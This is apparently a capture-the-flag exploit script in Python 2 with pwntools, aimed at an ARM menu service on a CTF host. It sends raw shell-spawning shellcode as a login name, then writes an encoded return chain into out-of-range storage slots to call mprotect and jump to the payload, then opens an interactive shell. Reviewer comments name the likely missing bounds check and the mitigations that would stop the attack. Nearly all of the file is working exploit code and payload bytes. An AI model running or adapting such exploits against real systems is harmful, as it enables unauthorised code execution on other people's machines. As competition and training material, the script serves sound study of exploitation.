# CTF write-up script (pwntools, Python 2: it relies on raw_input).
#
# What the script does, as far as this listing shows:
#   1. sends a blob of machine code as the login name,
#   2. picks menu entry "1" and writes twelve values into storage slots 14..25,
#   3. hands the connection to the operator.
# The author's notes at the bottom describe the intent: the stored values form
# a return chain that calls mprotect(0x99000, 0x1000, 0x7) and then continues
# at the address of the login buffer.
#
# NOTE(review): the six-character strings ("Swqbl4", "WhqByt", ...) are how the
# author writes each address for this service; the encoding itself is not shown
# on the page.
# NOTE(review): for the chain to land, the slot index presumably is not checked
# against the size of the storage array and the gadget addresses presumably do
# not change between runs. Confirm against the binary. A bounds check on the
# slot index, a stack canary, or a position-independent build would each break
# one step of it.
from pwn import *

#r = remote("0.0.0.0", 5555)
r = remote("pwn2.trinity.neo.ctf.rocks",31337)
#context.log_level = 'debug'


def login(r, shellcode):
    """Answer the "Login: " prompt with *shellcode* followed by a newline."""
    r.sendlineafter("Login: ", shellcode)


def store(r, index, data):
    """Write *data* into storage slot *index* and ask to store another one.

    Walks the three prompts in order: slot number, slot contents, and the
    "Store more?" question, which is always answered with "y".
    """
    prompts = (
        ("Select storage slot: ", str(index)),
        ("Data for storage: ", data),
        ("Store more? (y/n): ", "y"),
    )
    for prompt, answer in prompts:
        r.sendlineafter(prompt, answer)


# Payload sent as the login name. The pop {..., pc} gadgets below indicate an
# ARM target; the commented-out shellcraft.sh() lines at the end suggest where
# these bytes came from (TODO confirm).
shellcode = 'hp\x00\xe3AqD\xe3\x04p-\xe5/\x7f\x02\xe3/sG\xe3\x04p-\xe5/r\x06\xe3i~F\xe3\x04p-\xe5\r\x00\xa0\xe1sx\x06\xe3\x04p-\xe5\x0c\xc0,\xe0\x04\xc0-\xe5\x04\x10\xa0\xe3\r\x10\x81\xe0\x01\xc0\xa0\xe1\x04\xc0-\xe5\r\x10\xa0\xe1\x02 "\xe0\x0bp\xa0\xe3\x00\x00\x00\xef'
# Encoded address of that payload ("pc = login" in the notes below).
shellcode_addr = '4AGgG3'

# Gadget notes from the author (address : instruction, then its encoded form):
#0x00034cad : pop {r1, r2, r3, r4, r5, r6, pc}     WhqByt
#0x0006ef8c : pop {r0, pc}     Swqbl4
#0x00061dfd : pop {r0, r1, r2, r7, pc}
#00547D0 call mprot
#0x00010450 : pop {r4, pc}     HsB1T0
popr0 = "Swqbl4"
popr1r2r6 = "WhqByt"
#pop = "YMQVYd"

# Encoded mprotect arguments; presumably address, size and prot in that order
# (0x99000, 0x1000, 0x7 per the notes below).
mprotect_r0 = "3eMZYA"
mprotect_r1 = "Ml2N17"
mprotect_r2 = "JHKoU3"
call_mprot = "dyqkXm"

# The chain occupies consecutive slots starting at 14. Why 14 is the first
# useful slot is not shown on the page.
FIRST_SLOT = 14
chain = [
    popr0,           # slot 14: pop {r0, pc}
    mprotect_r0,     # slot 15: -> r0
    popr1r2r6,       # slot 16: pop {r1, r2, r3, r4, r5, r6, pc}
    mprotect_r1,     # slot 17: -> r1
    mprotect_r2,     # slot 18: -> r2
    "AAAA",          # slot 19: -> r3 (filler)
    shellcode_addr,  # slot 20: -> r4
    "AAAA",          # slot 21: -> r5 (filler)
    "AAAA",          # slot 22: -> r6 (filler)
    call_mprot,      # slot 23: -> pc, the "call mprot" site
    "AAAA",          # slot 24: filler
    shellcode_addr,  # slot 25: where execution continues after the call
]

raw_input(">>")  # pause so a debugger can be attached before anything is sent
login(r,shellcode)
r.sendlineafter("@RRF-CONTROL> ","1")

for slot, word in enumerate(chain, FIRST_SLOT):
    store(r, slot, word)

raw_input(">>")  # second pause, after the last slot has been written
r.interactive()

# Author's scratch notes, kept as written:
#shellcraft.sh()
#asm(shellcraft.sh())
#context.arch = 'amd64'
#mprotect(address, size, prot)
#          0x99000  0x1000 0x7
#pc = login
# (original note was Korean typed on a Latin keyboard layout; it appears to
#  say "return into mprotect")
#pc = call mprotect
asdasd